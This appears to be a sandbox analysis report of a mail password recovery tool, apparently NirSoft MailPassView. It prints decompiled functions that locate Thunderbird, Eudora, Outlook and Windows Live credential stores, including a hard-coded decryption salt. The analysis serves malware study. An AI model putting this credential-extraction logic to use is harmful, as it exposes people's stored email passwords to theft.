                                                  C-Code - Quality: 97%
                                                  			E00401E8B(void* __eflags, char* _a4) {
                                                  				signed int _v8;
                                                  				int _v12;
                                                  				void _v275;
                                                  				char _v276;
                                                  				void _v539;
                                                  				char _v540;
                                                  				void _v795;
                                                  				char _v796;
                                                  				void _v1059;
                                                  				char _v1060;
                                                  				void _v1323;
                                                  				char _v1324;
                                                  				void _v2347;
                                                  				char _v2348;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				int _t65;
                                                  				char* _t69;
                                                  				char _t70;
                                                  				int _t71;
                                                  				char _t75;
                                                  				void* _t76;
                                                  				long _t78;
                                                  				void* _t83;
                                                  				int _t85;
                                                  				void* _t87;
                                                  				int _t104;
                                                  				int _t108;
                                                  				char _t126;
                                                  				void* _t137;
                                                  				void* _t139;
                                                  				char* _t157;
                                                  				char* _t158;
                                                  				char* _t160;
                                                  				int _t161;
                                                  				void* _t164;
                                                  				CHAR* _t169;
                                                  				char* _t170;
                                                  				void* _t171;
                                                  				void* _t172;
                                                  				void* _t173;
                                                  				void* _t174;
                                                  				void* _t175;
                                                  
                                                  				_v540 = 0;
                                                  				memset( &_v539, 0, 0x104);
                                                  				_t164 = 0x1a;
                                                  				E0040EE59( &_v540, _t164); // executed
                                                  				_t65 = strlen("Mozilla\\Profiles");
                                                  				_t6 = strlen( &_v540) + 1; // 0x1
                                                  				_t172 = _t171 + 0x14;
                                                  				if(_t65 + _t6 >= 0x104) {
                                                  					_t69 = _a4;
                                                  					 *_t69 = 0;
                                                  					_t157 = _t69;
                                                  				} else {
                                                  					_t157 = _a4;
                                                  					E004062AD(_t157,  &_v540, "Mozilla\\Profiles");
                                                  				}
                                                  				_t70 = E0040614B(_t157);
                                                  				if(_t70 == 0) {
                                                  					 *_t157 = _t70;
                                                  				}
                                                  				_t158 = _t157 + 0x105;
                                                  				_t71 = strlen("Thunderbird\\Profiles");
                                                  				_t12 = strlen( &_v540) + 1; // 0x1
                                                  				if(_t71 + _t12 >= 0x104) {
                                                  					 *_t158 = 0;
                                                  				} else {
                                                  					E004062AD(_t158,  &_v540, "Thunderbird\\Profiles");
                                                  				}
                                                  				_t75 = E0040614B(_t158);
                                                  				_pop(_t137);
                                                  				if(_t75 == 0) {
                                                  					 *_t158 = _t75;
                                                  				}
                                                  				_t160 = _a4 + 0x20a;
                                                  				_t76 = E00401C97(_t137, _t160, 0x80000001, "Software\\Qualcomm\\Eudora\\CommandLine", "current"); // executed
                                                  				_t173 = _t172 + 0xc;
                                                  				if(_t76 == 0) {
                                                  					_t126 = E00401C97(_t137, _t160, 0x80000002, "Software\\Classes\\Software\\Qualcomm\\Eudora\\CommandLine\\current", 0x412466); // executed
                                                  					_t173 = _t173 + 0xc;
                                                  					if(_t126 == 0) {
                                                  						 *_t160 = _t126;
                                                  					}
                                                  				}
                                                  				_v8 = _v8 & 0x00000000;
                                                  				_t78 = E0040EB3F(0x80000002, "Software\\Mozilla\\Mozilla Thunderbird",  &_v8);
                                                  				_t174 = _t173 + 0xc;
                                                  				if(_t78 != 0) {
                                                  					L32:
                                                  					_t169 = _a4 + 0x30f;
                                                  					if( *_t169 != 0) {
                                                  						L35:
                                                  						return _t78;
                                                  					}
                                                  					ExpandEnvironmentStringsA("%programfiles%\\Mozilla Thunderbird", _t169, 0x104);
                                                  					_t78 = E0040614B(_t169);
                                                  					if(_t78 != 0) {
                                                  						goto L35;
                                                  					}
                                                  					 *_t169 = _t78;
                                                  					return _t78;
                                                  				} else {
                                                  					_v796 = _t78;
                                                  					_t161 = 0;
                                                  					memset( &_v795, 0, 0xff);
                                                  					_v12 = 0;
                                                  					_t83 = E0040EC05(_v8, 0,  &_v796);
                                                  					_t175 = _t174 + 0x18;
                                                  					if(_t83 != 0) {
                                                  						L31:
                                                  						_t78 = RegCloseKey(_v8);
                                                  						goto L32;
                                                  					}
                                                  					_t170 = "sqlite3.dll";
                                                  					do {
                                                  						_t85 = atoi( &_v796);
                                                  						_pop(_t139);
                                                  						if(_t85 < 3) {
                                                  							goto L28;
                                                  						}
                                                  						_v2348 = 0;
                                                  						memset( &_v2347, _t161, 0x3ff);
                                                  						_v276 = 0;
                                                  						memset( &_v275, _t161, 0x104);
                                                  						sprintf( &_v2348, "%s\\Main",  &_v796);
                                                  						E0040EBC1(_t139, _v8,  &_v2348, "Install Directory",  &_v276, 0x104);
                                                  						_t175 = _t175 + 0x38;
                                                  						if(_v276 != 0 && E0040614B( &_v276) != 0) {
                                                  							_v1060 = 0;
                                                  							memset( &_v1059, _t161, 0x104);
                                                  							_v1324 = 0;
                                                  							memset( &_v1323, _t161, 0x104);
                                                  							_t104 = strlen(_t170);
                                                  							_t41 = strlen( &_v276) + 1; // 0x1
                                                  							_t175 = _t175 + 0x20;
                                                  							if(_t104 + _t41 >= 0x104) {
                                                  								_v1060 = 0;
                                                  							} else {
                                                  								E004062AD( &_v1060,  &_v276, _t170);
                                                  							}
                                                  							_t108 = strlen("nss3.dll");
                                                  							_t47 = strlen( &_v276) + 1; // 0x1
                                                  							if(_t108 + _t47 >= 0x104) {
                                                  								_v1324 = 0;
                                                  							} else {
                                                  								E004062AD( &_v1324,  &_v276, "nss3.dll");
                                                  							}
                                                  							if(E0040614B( &_v1060) == 0 || E0040614B( &_v1324) == 0) {
                                                  								_t161 = 0;
                                                  								goto L28;
                                                  							} else {
                                                  								strcpy(_a4 + 0x30f,  &_v276);
                                                  								goto L31;
                                                  							}
                                                  						}
                                                  						L28:
                                                  						_v12 = _v12 + 1;
                                                  						_t87 = E0040EC05(_v8, _v12,  &_v796);
                                                  						_t175 = _t175 + 0xc;
                                                  					} while (_t87 == 0);
                                                  					goto L31;
                                                  				}
                                                  			}
                                                  0x00401ea6
                                                  0x00401ead
                                                  0x00401eb4
                                                  0x00401ebb
                                                  0x00401ec6
                                                  0x00401ed9
                                                  0x00401edd
                                                  0x00401ee2
                                                  0x00401efa
                                                  0x00401efd
                                                  0x00401f00
                                                  0x00401ee4
                                                  0x00401ee4
                                                  0x00401ef1
                                                  0x00401ef7
                                                  0x00401f03
                                                  0x00401f0b
                                                  0x00401f0d
                                                  0x00401f0d
                                                  0x00401f14
                                                  0x00401f1a
                                                  0x00401f2d
                                                  0x00401f35
                                                  0x00401f4e
                                                  0x00401f37
                                                  0x00401f45
                                                  0x00401f4b
                                                  0x00401f52
                                                  0x00401f59
                                                  0x00401f5a
                                                  0x00401f5c
                                                  0x00401f5c
                                                  0x00401f6b
                                                  0x00401f76
                                                  0x00401f7b
                                                  0x00401f85
                                                  0x00401f92
                                                  0x00401f97
                                                  0x00401f9c
                                                  0x00401f9e
                                                  0x00401f9e
                                                  0x00401f9c
                                                  0x00401fa0
                                                  0x00401fae
                                                  0x00401fb3
                                                  0x00401fb8
                                                  0x004021a9
                                                  0x004021ac
                                                  0x004021b5
                                                  0x004021d5
                                                  0x004021d5
                                                  0x004021d5
                                                  0x004021be
                                                  0x004021c5
                                                  0x004021cd
                                                  0x00000000
                                                  0x00000000
                                                  0x004021cf
                                                  0x00000000
                                                  0x00401fbe
                                                  0x00401fc3
                                                  0x00401fc9
                                                  0x00401fd3
                                                  0x00401fe3
                                                  0x00401fe6
                                                  0x00401feb
                                                  0x00401ff0
                                                  0x004021a0
                                                  0x004021a3
                                                  0x00000000
                                                  0x004021a3
                                                  0x00401ff6
                                                  0x00401ffb
                                                  0x00402002
                                                  0x0040200a
                                                  0x0040200b
                                                  0x00000000
                                                  0x00000000
                                                  0x0040201e
                                                  0x00402025
                                                  0x00402033
                                                  0x0040203a
                                                  0x00402052
                                                  0x0040206e
                                                  0x00402073
                                                  0x0040207d
                                                  0x004020a1
                                                  0x004020a8
                                                  0x004020b6
                                                  0x004020bd
                                                  0x004020c3
                                                  0x004020d6
                                                  0x004020da
                                                  0x004020df
                                                  0x004020f8
                                                  0x004020e1
                                                  0x004020ef
                                                  0x004020f5
                                                  0x00402104
                                                  0x00402117
                                                  0x0040211f
                                                  0x0040213c
                                                  0x00402121
                                                  0x00402133
                                                  0x00402139
                                                  0x00402152
                                                  0x00402165
                                                  0x00000000
                                                  0x00402189
                                                  0x00402199
                                                  0x00000000
                                                  0x0040219f
                                                  0x00402152
                                                  0x00402167
                                                  0x00402167
                                                  0x00402177
                                                  0x0040217c
                                                  0x0040217f
                                                  0x00000000
                                                  0x00402187

                                                  APIs
                                                  • memset.MSVCRT ref: 00401EAD
                                                  • strlen.MSVCRT ref: 00401EC6
                                                  • strlen.MSVCRT ref: 00401ED4
                                                  • strlen.MSVCRT ref: 00401F1A
                                                  • strlen.MSVCRT ref: 00401F28
                                                  • memset.MSVCRT ref: 00401FD3
                                                  • atoi.MSVCRT ref: 00402002
                                                  • memset.MSVCRT ref: 00402025
                                                  • sprintf.MSVCRT ref: 00402052
                                                    • Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA
                                                  • memset.MSVCRT ref: 004020A8
                                                  • memset.MSVCRT ref: 004020BD
                                                  • strlen.MSVCRT ref: 004020C3
                                                  • strlen.MSVCRT ref: 004020D1
                                                  • strlen.MSVCRT ref: 00402104
                                                  • strlen.MSVCRT ref: 00402112
                                                  • memset.MSVCRT ref: 0040203A
                                                    • Part of subcall function 004062AD: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062B5
                                                    • Part of subcall function 004062AD: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062C4
                                                  • strcpy.MSVCRT(?,00000000), ref: 00402199
                                                  • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004021A3
                                                  • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004021BE
                                                    • Part of subcall function 0040614B: GetFileAttributesA.KERNELBASE(?,004081BE,?,00408274,00000000,?,00000000,00000104,?), ref: 0040614F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strlen$memset$Closestrcpy$AttributesEnvironmentExpandFileStringsatoisprintfstrcat
                                                  • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                  • API String ID: 2492260235-4223776976
                                                  • Opcode ID: ac5e96ee30ae2dd9ced97f1bdc4fbeb635d430268e29e54df0797c77c4e8013e
                                                  • Instruction ID: fcae88f02dbfb35d0bd4b12665d2d891c1e7b320b053452542e36e55e3802549
                                                  • Opcode Fuzzy Hash: ac5e96ee30ae2dd9ced97f1bdc4fbeb635d430268e29e54df0797c77c4e8013e
                                                  • Instruction Fuzzy Hash: C891E472904158BADB21E765CC46FDA77AC9F44308F1004BBF609F2182EB789BD58B5D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 85%
                                                  			E0040B9AD(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                  				char* _v8;
                                                  				intOrPtr _v12;
                                                  				intOrPtr _v16;
                                                  				intOrPtr _v28;
                                                  				intOrPtr _v32;
                                                  				void* _v304;
                                                  				signed int _v308;
                                                  				struct HWND__* _v312;
                                                  				intOrPtr _v604;
                                                  				struct HACCEL__* _v620;
                                                  				struct HWND__* _v644;
                                                  				char _v900;
                                                  				char _v904;
                                                  				char _v908;
                                                  				struct tagMSG _v936;
                                                  				intOrPtr _v940;
                                                  				struct HWND__* _v944;
                                                  				struct HWND__* _v948;
                                                  				char _v956;
                                                  				char _v980;
                                                  				char _v988;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				void* _t49;
                                                  				void* _t52;
                                                  				int _t56;
                                                  				int _t58;
                                                  				int _t68;
                                                  				void* _t72;
                                                  				int _t75;
                                                  				int _t77;
                                                  				struct HWND__* _t78;
                                                  				int _t80;
                                                  				int _t85;
                                                  				int _t86;
                                                  				struct HWND__* _t100;
                                                  
                                                  				 *0x416b94 = _a4; // executed
                                                  				_t49 = E00404837(__ecx); // executed
                                                  				if(_t49 != 0) {
                                                  					E0040EDAC();
                                                  					_t52 = E00406A2C( &_v980);
                                                  					_t100 = 0;
                                                  					_v940 = 0x20;
                                                  					_v948 = 0;
                                                  					_v936.hwnd = 0;
                                                  					_v944 = 0;
                                                  					_v936.message = 0;
                                                  					E0040B785(_t52,  &_v900);
                                                  					_v8 =  &_v980;
                                                  					E00406C87(__eflags,  &_v980, _a12);
                                                  					_t56 = E00406DFB(_v16, "/savelangfile");
                                                  					__eflags = _t56;
                                                  					if(_t56 < 0) {
                                                  						E0040823D(); // executed
                                                  						_t58 = E00406DFB(_v8, "/deleteregkey");
                                                  						__eflags = _t58;
                                                  						if(_t58 < 0) {
                                                  							 *0x417110 = 0x11223344; // executed
                                                  							EnumResourceTypesA( *0x416b94, E0040ED91, 0); // executed
                                                  							__eflags =  *0x417110 - 0x1c233487;
                                                  							if( *0x417110 == 0x1c233487) {
                                                  								__eflags =  *((intOrPtr*)(_v12 + 0x30)) - 1;
                                                  								if(__eflags <= 0) {
                                                  									L13:
                                                  									__imp__CoInitialize(_t100);
                                                  									E0040B70A( &_v908);
                                                  									__eflags = _v604 - 3;
                                                  									if(_v604 != 3) {
                                                  										_push(5);
                                                  									} else {
                                                  										_push(3);
                                                  									}
                                                  									ShowWindow(_v644, ??);
                                                  									UpdateWindow(_v644);
                                                  									_v620 = LoadAcceleratorsA( *0x416b94, 0x67);
                                                  									E0040AD9D( &_v908);
                                                  									_t68 = GetMessageA( &_v936, _t100, _t100, _t100);
                                                  									__eflags = _t68;
                                                  									if(_t68 == 0) {
                                                  										L24:
                                                  										__imp__CoUninitialize();
                                                  										goto L25;
                                                  									} else {
                                                  										do {
                                                  											_t75 = TranslateAcceleratorA(_v644, _v620,  &_v936);
                                                  											__eflags = _t75;
                                                  											if(_t75 != 0) {
                                                  												goto L23;
                                                  											}
                                                  											_t78 =  *0x4171ac;
                                                  											__eflags = _t78 - _t100;
                                                  											if(_t78 == _t100) {
                                                  												L21:
                                                  												_t80 = IsDialogMessageA(_v644,  &_v936);
                                                  												__eflags = _t80;
                                                  												if(_t80 == 0) {
                                                  													TranslateMessage( &_v936);
                                                  													DispatchMessageA( &_v936);
                                                  												}
                                                  												goto L23;
                                                  											}
                                                  											_t85 = IsDialogMessageA(_t78,  &_v936);
                                                  											__eflags = _t85;
                                                  											if(_t85 != 0) {
                                                  												goto L23;
                                                  											}
                                                  											goto L21;
                                                  											L23:
                                                  											_t77 = GetMessageA( &_v936, _t100, _t100, _t100);
                                                  											__eflags = _t77;
                                                  										} while (_t77 != 0);
                                                  										goto L24;
                                                  									}
                                                  								}
                                                  								_t86 = E0040B8D7( &_v904, __eflags);
                                                  								__eflags = _t86;
                                                  								if(_t86 == 0) {
                                                  									_t100 = 0;
                                                  									__eflags = 0;
                                                  									goto L13;
                                                  								}
                                                  								_push(_v28);
                                                  								_v904 = 0x41356c;
                                                  								L004115D6();
                                                  								__eflags = _v304;
                                                  								if(_v304 != 0) {
                                                  									DeleteObject(_v304);
                                                  									_v308 = _v308 & 0x00000000;
                                                  								}
                                                  								goto L27;
                                                  							}
                                                  							MessageBoxA(0, "Failed to load the executable file !", "Error", 0x30);
                                                  							goto L25;
                                                  						}
                                                  						RegDeleteKeyA(0x80000001, "Software\\NirSoft\\MailPassView");
                                                  						goto L25;
                                                  					} else {
                                                  						 *0x417488 = 0x416b28;
                                                  						E0040836E();
                                                  						L25:
                                                  						_push(_v32);
                                                  						_v908 = 0x41356c;
                                                  						L004115D6();
                                                  						__eflags = _v308 - _t100;
                                                  						if(_v308 != _t100) {
                                                  							DeleteObject(_v308);
                                                  							_v312 = _t100;
                                                  						}
                                                  						L27:
                                                  						_v908 = 0x412474;
                                                  						E00406A4E( &_v988);
                                                  						E0040462E( &_v956);
                                                  						E00406A4E( &_v988);
                                                  						_t72 = 0;
                                                  						__eflags = 0;
                                                  						goto L28;
                                                  					}
                                                  				} else {
                                                  					_t72 = _t49 + 1;
                                                  					L28:
                                                  					return _t72;
                                                  				}
                                                  			}
                                                  Instruction address column for the listing above: 0x0040b9bf through 0x0040bc46 (per-line alignment with the C code is not preserved in this view)

                                                  APIs
                                                    • Part of subcall function 00404837: LoadLibraryA.KERNEL32(comctl32.dll,74B04DE0,?,00000000,?,?,?,0040B9C9,74B04DE0), ref: 00404856
                                                    • Part of subcall function 00404837: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404868
                                                    • Part of subcall function 00404837: FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040B9C9,74B04DE0), ref: 0040487C
                                                    • Part of subcall function 00404837: MessageBoxA.USER32 ref: 004048A7
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040BBF8
                                                  • DeleteObject.GDI32(?), ref: 0040BC0E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                  • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !$Software\NirSoft\MailPassView
                                                  • API String ID: 745651260-414181363
                                                  • Opcode ID: 16f53dabeb4a883268802abd1063420dcaf51a14d4cbe642e390ff1ea210f197
                                                  • Instruction ID: 29be9d14b742f54cd69d53bb86675b71f99c80547e1740e7b57482248bd42427
                                                  • Opcode Fuzzy Hash: 16f53dabeb4a883268802abd1063420dcaf51a14d4cbe642e390ff1ea210f197
                                                  • Instruction Fuzzy Hash: 9D518D71108345ABC7209F61DD09A9BBBF8FF84705F00483FF685A22A1DB789914CB5E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 65%
                                                  			E00403C3D(signed int __ecx, void* __eflags, void* __fp0) {
                                                  				char _v8;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				struct HINSTANCE__* _t38;
                                                  				void* _t52;
                                                  				void* _t54;
                                                  				void* _t56;
                                                  				void* _t58;
                                                  				void* _t60;
                                                  				char* _t73;
                                                  				void* _t76;
                                                  				_Unknown_base(*)()* _t86;
                                                  				void* _t87;
                                                  				void* _t89;
                                                  				signed int _t98;
                                                  				char* _t106;
                                                  				_Unknown_base(*)()* _t120;
                                                  				void* _t131;
                                                  
                                                  				_t131 = __fp0;
                                                  				_t91 = __ecx;
                                                  				_push(__ecx);
                                                  				_t98 = __ecx;
                                                  				_t89 = __ecx + 0x87c;
                                                  				 *(_t89 + 0xc) =  *(_t89 + 0xc) & 0x00000000;
                                                  				E0040E894(_t89);
                                                  				_t38 = LoadLibraryA("pstorec.dll"); // executed
                                                  				 *(_t89 + 8) = _t38;
                                                  				if(_t38 == 0) {
                                                  					L4:
                                                  					E0040E894(_t89);
                                                  				} else {
                                                  					_t86 = GetProcAddress(_t38, "PStoreCreateInstance");
                                                  					_t120 = _t86;
                                                  					_t91 = 0 | _t120 != 0x00000000;
                                                  					 *(_t89 + 0x10) = _t86;
                                                  					if(_t120 != 0) {
                                                  						goto L4;
                                                  					} else {
                                                  						_t91 = _t89 + 4;
                                                  						_t87 =  *_t86(_t89 + 4, 0, 0, 0);
                                                  						_t122 = _t87;
                                                  						if(_t87 != 0) {
                                                  							goto L4;
                                                  						} else {
                                                  							 *(_t89 + 0xc) = 1;
                                                  						}
                                                  					}
                                                  				}
                                                  				E004047A0(_t98 + 0x890, _t122);
                                                  				E004036CC(_t91, _t98, _t98 + 0x890, _t131, L"www.google.com/Please log in to your Gmail account");
                                                  				E004036CC(_t91, _t98, _t98 + 0x890, _t131, L"www.google.com:443/Please log in to your Gmail account");
                                                  				E004036CC(_t91, _t98, _t98 + 0x890, _t131, L"www.google.com/Please log in to your Google Account");
                                                  				E004036CC(_t91, _t98, _t98 + 0x890, _t131, L"www.google.com:443/Please log in to your Google Account");
                                                  				_push(_t98 + 0x858); // executed
                                                  				E0040754D(_t91, _t122); // executed
                                                  				E0040719C(_t91, _t98 + 0x86c); // executed
                                                  				E0040765B(_t122, _t98 + 0x878); // executed
                                                  				_t52 = E0040EB3F(0x80000001, "Software\\Microsoft\\Internet Account Manager\\Accounts",  &_v8);
                                                  				_t123 = _t52;
                                                  				if(_t52 == 0) {
                                                  					E00402BB8(_t91,  &_v8, _t123, _t131, _t98, 1);
                                                  				}
                                                  				_t54 = E0040EB3F(0x80000001, "Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts",  &_v8);
                                                  				_t124 = _t54;
                                                  				if(_t54 == 0) {
                                                  					E00402BB8(_t91,  &_v8, _t124, _t131, _t98, 5);
                                                  				}
                                                  				E00402C44(_t91, _t131, _t98); // executed
                                                  				 *((intOrPtr*)(_t98 + 0xb1c)) = 6;
                                                  				_t56 = E00406278();
                                                  				_push( &_v8);
                                                  				if( *((intOrPtr*)(_t56 + 0x10)) != 1) {
                                                  					_push("Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles");
                                                  				} else {
                                                  					_push("Software\\Microsoft\\Windows Messaging Subsystem\\Profiles");
                                                  				}
                                                  				_push(0x80000001);
                                                  				_t58 = E0040EB3F();
                                                  				_t126 = _t58;
                                                  				if(_t58 != 0) {
                                                  					 *((char*)(_t98 + 0xa9c)) = 0;
                                                  				} else {
                                                  					E00402B09( &_v8, _t126, _t131, _t98);
                                                  				}
                                                  				 *((intOrPtr*)(_t98 + 0xb1c)) = 0xf;
                                                  				_t60 = E0040EB3F(0x80000001, "Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles",  &_v8);
                                                  				_t127 = _t60;
                                                  				if(_t60 != 0) {
                                                  					 *((char*)(_t98 + 0xa9c)) = 0;
                                                  				} else {
                                                  					E00402B09( &_v8, _t127, _t131, _t98);
                                                  				}
                                                  				E0040E8AB(_t89);
                                                  				E004047F1(_t98 + 0x890);
                                                  				E00402FC2(_t98, _t91, _t131, 0x80000001); // executed
                                                  				E00402FC2(_t98, _t91, _t131, 0x80000002); // executed
                                                  				E0040329E(_t131, _t98);
                                                  				E004034CB(_t91, _t127, _t131, _t98); // executed
                                                  				E0040396C(_t127, _t131, _t98); // executed
                                                  				E004037B1(_t91, _t98, _t131, _t98); // executed
                                                  				_t73 = _t98 + 0xb20;
                                                  				_t128 =  *_t73;
                                                  				if( *_t73 != 0) {
                                                  					 *((intOrPtr*)(_t98 + 0xf34)) = 0xa;
                                                  					E0040D37A(_t98 + 0x1c8, _t128, _t73, 0);
                                                  				}
                                                  				_t106 = _t98 + 0xc25;
                                                  				_t129 =  *_t106;
                                                  				if( *_t106 != 0) {
                                                  					strcpy(_t98 + 0x52a, _t98 + 0xe2f);
                                                  					 *((intOrPtr*)(_t98 + 0xf34)) = 0xb;
                                                  					E0040D37A(_t98 + 0x1c8, _t129, _t106, 0);
                                                  				}
                                                  				_push(_t98 + 0x640); // executed
                                                  				E0040D9F9(_t129); // executed
                                                  				E0040D865(_t98 + 0x640);
                                                  				_t76 = E00410D1B(_t98 + 0x870, _t98 + 0x870); // executed
                                                  				return _t76;
                                                  			}

                                                  Instruction address column for E00403C3D above: 0x00403c3d through 0x00403e86 (per-line alignment with the C code is not preserved in this view)

                                                  APIs
                                                    • Part of subcall function 0040E894: FreeLibrary.KERNELBASE(?,0040E8C8,?,?,?,?,?,?,0040421D), ref: 0040E8A0
                                                  • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C5C
                                                  • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C71
                                                  • strcpy.MSVCRT(?,?), ref: 00403E45
                                                  Strings
                                                  • www.google.com:443/Please log in to your Gmail account, xrefs: 00403CB7
                                                  • www.google.com/Please log in to your Google Account, xrefs: 00403CC1
                                                  • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D95
                                                  • www.google.com/Please log in to your Gmail account, xrefs: 00403CAD
                                                  • www.google.com:443/Please log in to your Google Account, xrefs: 00403CCB
                                                  • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D69
                                                  • PStoreCreateInstance, xrefs: 00403C6B
                                                  • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403D22
                                                  • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D62
                                                  • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CFD
                                                  • pstorec.dll, xrefs: 00403C57
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Library$AddressFreeLoadProcstrcpy
                                                  • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                  • API String ID: 2884822230-961845771
                                                  • Opcode ID: 736501e530afa2727e5d55e5ce378ede5b836f248ef61c614794b5a243445e0a
                                                  • Instruction ID: d05da07ce2d894a49ef5f331cfc6c83e82fbb8602fa7f27bb7646818df223e42
                                                  • Opcode Fuzzy Hash: 736501e530afa2727e5d55e5ce378ede5b836f248ef61c614794b5a243445e0a
                                                  • Instruction Fuzzy Hash: 9B51D771600605B6D714BF72CD46BEABB6CAF00709F10053FF905B61C2DBBCAA5587A9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 96%
                                                  			E0040D9F9(void* __eflags, void* _a4, int _a8, int _a12, void* _a16, char _a20, void* _a24, int _a28, void* _a32, int _a36, void _a40, void _a104) {
                                                  				void* _v0;
                                                  				void* __esi;
                                                  				long _t34;
                                                  				long _t36;
                                                  				long _t40;
                                                  				void* _t64;
                                                  				void* _t68;
                                                  				int _t73;
                                                  
                                                  				E004118A0(0x102c, _t64);
                                                  				_t34 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\IdentityCRL", 0, 0x20019,  &_v0); // executed
                                                  				if(_t34 != 0) {
                                                  					L10:
                                                  					return _t34;
                                                  				}
                                                  				_t36 = RegOpenKeyExA(_v0, "Dynamic Salt", 0, 0x20019,  &_a4); // executed
                                                  				if(_t36 != 0) {
                                                  					L9:
                                                  					_t34 = RegCloseKey(_v0); // executed
                                                  					goto L10;
                                                  				}
                                                  				_a8 = 0x1000;
                                                  				_t40 = RegQueryValueExA(_a4, "Value", 0,  &_a36,  &_a40,  &_a8);
                                                  				_t81 = _t40;
                                                  				if(_t40 == 0) {
                                                  					_t63 = _a4 + 0xc;
                                                  					if(E004047A0(_a4 + 0xc, _t81) != 0) {
                                                  						_a20 = _a8;
                                                  						_a24 =  &_a40;
                                                  						_t73 = 0x40;
                                                  						_t68 = L"%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd";
                                                  						_a28 = _t73;
                                                  						_a32 = _t68;
                                                  						if(E00404811(_t63,  &_a20,  &_a28,  &_a12) != 0) {
                                                  							if(_a12 < 0x400) {
                                                  								memcpy( &_a40, _t68, _t73);
                                                  								memcpy( &_a104, _a16, _a12);
                                                  								E0040D6FB(_t64, _a12 + _t73, _a4,  &_a40, _a12 + _t73, _v0);
                                                  							}
                                                  							LocalFree(_a16);
                                                  						}
                                                  					}
                                                  				}
                                                  				RegCloseKey(_a4);
                                                  				goto L9;
                                                  			}

                                                  APIs
                                                  • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E70,?), ref: 0040DA2A
                                                  • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E70,?), ref: 0040DA44
                                                  • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E70,?), ref: 0040DA6F
                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E70,?), ref: 0040DB20
                                                    • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,75D6F420), ref: 004047A8
                                                    • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                  • memcpy.MSVCRT ref: 0040DADD
                                                  • memcpy.MSVCRT ref: 0040DAF2
                                                    • Part of subcall function 0040D6FB: RegOpenKeyExA.ADVAPI32(0040DB12,Creds,00000000,00020019,0040DB12,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040DB12,?,?,?,?), ref: 0040D725
                                                    • Part of subcall function 0040D6FB: memset.MSVCRT ref: 0040D743
                                                    • Part of subcall function 0040D6FB: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040D847
                                                    • Part of subcall function 0040D6FB: RegCloseKey.ADVAPI32(?), ref: 0040D858
